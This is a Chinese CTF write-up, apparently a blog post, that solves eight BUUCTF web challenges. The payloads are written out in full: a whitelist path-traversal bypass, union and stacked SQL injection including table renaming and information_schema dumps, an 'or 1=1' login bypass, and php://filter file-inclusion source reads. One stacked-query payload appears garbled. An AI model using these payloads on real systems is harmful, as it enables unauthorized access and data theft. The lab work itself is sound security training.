buuctf Web
1.[HCTF 2018]WarmUp[HCTF 2018]WarmUp
访问url
http://e00c89a6-d7d6-4a78-a346-614edfb95738.node3.buuoj.cn/
如下
打开靶场后,查看源码即可看到
构造url访问获得index.php的源码
http://e00c89a6-d7d6-4a78-a346-614edfb95738.node3.buuoj.cn/index.php?file=source.php
如下
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
//传入了变量page,也就是我们刚刚传进来的file
{
// 这里定义了白名单
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
/*为了返回 true 两个条件必须满足
1 page存在
2 page是字符串 ,
这里和外层的判断file 一致基本是再次判断了一遍*/
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
return true;
}
/*in_array(search,array,type) 函数搜索数组中是否存在指定的值,
白名单过滤,需要返回了ture
所以这里我们传入的page或者是经过截断之后的page必须是soure.php或hint.php,
这里是正常的访问,我们需要构造文件任意包含,所以这里传入的不满足条件,这里不是注意的点,往下继续看*/
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
/*这里mb_sustr 是个截断,返回0到mb_strpos之间的内容,而mb_strps 则是查找第一次出现的位置,所以基本可以理解为获取page 两个?之间的字符串,也就是获取file两个?之间的字符串,放到url中就是http://ip/?file=ddd?中的file=ddd*/
if (in_array($_page, $whitelist)) {
return true;
}
//这里和上面类似 查看_page 是否在白名单中
$_page = urldecode($page); // 这里发现对_page进行了一次decode解码,
$_page = mb_substr(//获取两个??之间的内容
$_page,
0,
mb_strpos($_page . '?', '?')
);
// 这里是我们要绕过的点,从这里往上看 尝试构造
if (in_array($_page, $whitelist)) {//白名单
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
/*必须满足if条件,才能包含file,这里也可以猜到可能考的是文件包含:
1 REQUEST['file']不为空
2 REQUEST['file']是字符串
3 checkFile($_REQUEST['file']) 为ture,回到checkFile 函数分析如何返回true*/
?>
可以看到函数代码中有四个if语句
第一个if语句对变量进行检验,要求$page为字符串,否则返回false
第二个if语句判断$page是否存在于$whitelist数组中,存在则返回true
第三个if语句判断截取后的$page是否存在于$whitelist数组中,截取$page中'?'前部分,存在则返回true
第四个if语句判断url解码并截取后的$page是否存在于$whitelist中,存在则返回true
若以上四个if语句均未返回值,则返回false
有三个if语句可以返回true,第二个语句直接判断$page,不可用
第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用
第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f'),构造url:
file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
从代码中发现新的页面hint访问
http://e00c89a6-d7d6-4a78-a346-614edfb95738.node3.buuoj.cn/index.php?file=hint.php
获得flag文件名
构造payload,ffffllllaaaagggg提示每个字符都重复了4下,提示我们往上级目录翻四层
http://e00c89a6-d7d6-4a78-a346-614edfb95738.node3.buuoj.cn/index.php?file=hint.php?../…/…/…/…/ffffllllaaaagggg
http://e00c89a6-d7d6-4a78-a346-614edfb95738.node3.buuoj.cn/index.php?file=source.php?/…/…/…/…/ffffllllaaaagggg
得到flag{9cae45aa-4163-4c5a-b223-75baa14f4cc4}
2.[极客大挑战 2019]EasySQL
访问url
http://126a7b32-9f28-4b4c-ac00-73741dcc8ade.node3.buuoj.cn/
如下
第一种方法,看到登录框想到SQL注入,构造payload
?username=1’&password=2’
密码框存在注入
构造payload
?username=1&password=2’%23
正常回显
构造payload
?username=1&password=2’ order by 3%23
判断字段数为3
构造payload
?username=1&password=2’ and 1=2 union select 1,2,3%23
判断回显点,得到flag{82270ed5-107f-454b-b1ea-a452245b07a6}
第二种方法,因为登录成功就可以拿到flag,由上一道解法知道是字符型注入
构造payload
?username=admin’ or ‘1’=‘1&password=admin’ or ‘1’='1
得到flag{82270ed5-107f-454b-b1ea-a452245b07a6}
3.[强网杯 2019]随便注
访问url
http://9de6c06a-5267-431c-b404-99bf365ea17d.node3.buuoj.cn/
页面如下
重命名+堆叠注入
0x01:判断是否存在注入,注入是字符型还是数字型
输入1’发现不回显
输入1’ #显示正常
应该是存在sql注入了
输入1’ or ‘1’='1,正常回显,应该是字符型
0x02:猜解SQL查询语句中的字段数
输入1’ order by 3 # 回显出错,说明有两个字段
0x03:显示字段
输入1′ union select 1,2 # 回显一个正则过滤规则
过滤了 select,update,delete,drop,insert,where 和 点
过滤了这么多词,是不是有堆叠注入?尝试堆叠注入
0x04:查询数据库
输入1’;show databases;# 成功回显
说明存在堆叠注入
0x05:查询表
输入1’;show tables;# 成功回显
得到两个表words和1919810931114514
0x06:查询表中字段
输入0’;desc words;#
可以看到1919810931114514中有我们想要的flag字段
查询语句很有可能是 : selsect id,data from words where id =
因为可以堆叠查询,这时候就想到了一个改名的方法,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id
0’;rename table words to words1;rename table 1919810931114514
to words;alter table words change flag id varchar(100) 1’ or 1=1#CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#
如下
输入1’ or 1=1#,查询就得到flag{0a7b0405-0946-4894-837c-0ea64a5a1a1e}
4.[极客大挑战 2019]Havefun
访问url
http://2b9bca63-f8a6-49a3-8e46-291d9581747c.node3.buuoj.cn/
首页如下
右键查看网页源代码
这是一段PHP代码,我们以GET方式传入cat,直接输出cat的值,如果cat的值为dog则将直接输出Syc{cat_cat_cat_cat},构造payload
http://2b9bca63-f8a6-49a3-8e46-291d9581747c.node3.buuoj.cn/?cat=dog
得到flag{8d0db0b2-663a-4d65-bb2a-ea16376802da}
5.[SUCTF 2019]EasySQL
访问url
http://79340959-f795-4406-bd12-ec50c42ff14c.node3.buuoj.cn/
首页如下
堆叠注入
1;show databases;
1;show tables;
查列名发现from进入了黑名单,经查,背后逻辑是
select $_POST[query] || flag from flag
如何判断结构是这样?因为在输入任意字符后输出结果都为Array ( [0] => 1 ),那这个1肯定是或运算产生的布尔值,所有此处一定有或运算。
解法1
1;set sql_mode=PIPES_AS_CONCAT;select 1,构造成select 1;set sql_mode=PIPES_AS_CONCAT;select 1 || flag FROM Flag,其中PIPES_AS_CONCAT能将||视为字符串连接符而非或运算符,实际运行为select 1;set sql_mode=PIPES_AS_CONCAT;select “1”+flag from Flag
得到flag{d1158419-a015-4de7-9908-ff25678cca3a}
解法2
*,1,构造成select *,1 || flag from flag
6.[ACTF2020 新生赛]Include
访问url
http://42675000-beb8-4770-9107-0954c486629c.node3.buuoj.cn/
首页如下:
点击tips,跳转到url:
http://42675000-beb8-4770-9107-0954c486629c.node3.buuoj.cn/?file=flag.php
页面如下:
根据?file=flag.php 猜测是文件包含漏洞
php://filter与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。
php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode,用base64编码输出,不然会直接当做php代码执行,看不到源代码内容。
php://input 伪协议 + POST发送PHP代码 (不行)
构造payload进行访问:
?file=php://filter/read=convert.base64-encode/resource=flag.php
页面回显如下:
对回显的数据进行base64解码:
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7YmRkZmZlYTMtNTVlYS00OTJjLTg4NWYtMWZlY2Y2ODRkZTIyfQo=
结果如下:
<?php
echo "Can you find out the flag?";
//flag{bddffea3-55ea-492c-885f-1fecf684de22}
7.[极客大挑战 2019]Secret File
访问url:
http://008d0aab-224a-4ab8-b711-57782be3f259.node3.buuoj.cn/
首页如下:
前端中背景可以覆盖内容,页面源代码可以查看完整的html
在php文件中可以写入html代码,html可在前端展示出来,php代码主要是处理数据,通常不会展示。
文件包含漏洞,PHP伪协议获取文件
php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。
环境概要:
PHP.ini:
allow_url_fopen :on 默认开启 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。
allow_url_include:off 默认关闭,该选项为on便是允许 包含URL 对象文件等。
我们可以看到一页背景为黑色,字体为红色的页面,这里已经给出了一个提示:想要的话可以给你,去找吧!把一切都放在那里了!我们可以猜测这个页面是隐藏了一些信息的。
通过查看页面源代码,我们可以发现隐藏的./Archive_room.php
访问Archive_room.php,发现又给出了提示:我把他们都放在这里了,去看看吧。还有一个类似button一样的东西,查看审查元素可知是action.php
我们点进去,访问action.php立即跳转到了end.php,并且页面显示的是:查阅结束 没看清么?回去再仔细看看吧。
可以猜测action.php访问时间很短,时间一到立即跳转到end.php。为了拦截action.php,我们可以使用BrupSuite来抓包。
请求包如下:
GET /action.php HTTP/1.1
Host: 008d0aab-224a-4ab8-b711-57782be3f259.node3.buuoj.cn
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://008d0aab-224a-4ab8-b711-57782be3f259.node3.buuoj.cn/Archive_room.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=37b794a6-22e3-4bc9-882a-7c4e8fce86a2.ZP-4gQWh8p_KrNccRxl0BEY0YgY
Connection: close
响应包如下:
访问secr3t.php,页面显示了php代码:
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
发现这里有一个文件包含漏洞,但是在这里好像没什么用,因为我们还不确定存在flag的文件。根据代码的注释内容,访问flag.php。又出现提示:啊哈!你找到我了!可是你看不到我QAQ~~~ 我就在这里。
刚开始我们以为还是像之前一样用背景把flag给覆盖掉了,但是通过查看页面源代码发现并没有将flag写出来。根据提示我们可以肯定flag确实是在这里,但是前端却看不到,我们猜测flag是写在了php代码里面。那么怎样来获取完整的flag.php文件呢?我们立马想到了secr3t.php的文件包含漏洞
传入的file经过了一些过滤,但是没有过滤filter,我们可以用php://fileter来获取文件。构造url:
/secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
获取到了flag.php的base64加密,复制加密内容到解密网站去即可得到flag
对回显的数据进行base64解码:
PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTc4MjM3YWUtMGNiYS00NTlkLTg3N2QtNjBmYmQ4NzNkNWEwfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=
结果如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{e78237ae-0cba-459d-877d-60fbd873d5a0}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>
8.[极客大挑战 2019]LoveSQL
访问url:
http://e46c62ea-857f-4497-8656-5dd8bc8fa62a.node3.buuoj.cn/
首页如下:
发现登录框,可能是万能密码登录,我们试一下:
在登录框中输入:
用户名:1’ or 1=1#
密码:123(随便输)
点击登录:
跳转到了check.php页面。并得到了用户名和密码:
尝试密码md5解密失败,还是回到注入的思路上,查询字段数:
在url中输入:
/check.php?username=admin’ order by 3%23&password=1 存在
/check.php?username=admin’ order by 4%23&password=1 报错
注意:此时是在url中输入的,所以不能用#,而用其url编码%23。
可知共3个字段。用union查询测试注入点(回显点位):
/check.php?username=1’ union select 1,2,3%23&password=1
得到回显点位为2和3
查询当前数据库名及版本:
/check.php?username=1’ union select 1,database(),version()%23&password=1
可知当前数据库为geek
接下来爆表:
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
得到表名为geekuser,l0ve1ysq1
试一下l0ve1ysq1这个表,爆字段:
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1
得到字段名为id,username,password
爆数据:
/check.php?username=1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag{0496f85f-c789-491f-93b8-7c76bdbe8a4a}
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。
博客:
https://rdyx0.github.io/
先知社区:
https://xz.aliyun.com/u/37846
SecIN:
https://www.sec-in.com/author/3097
CSDN:
https://blog.csdn.net/weixin_48899364?type=blog
公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect
FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85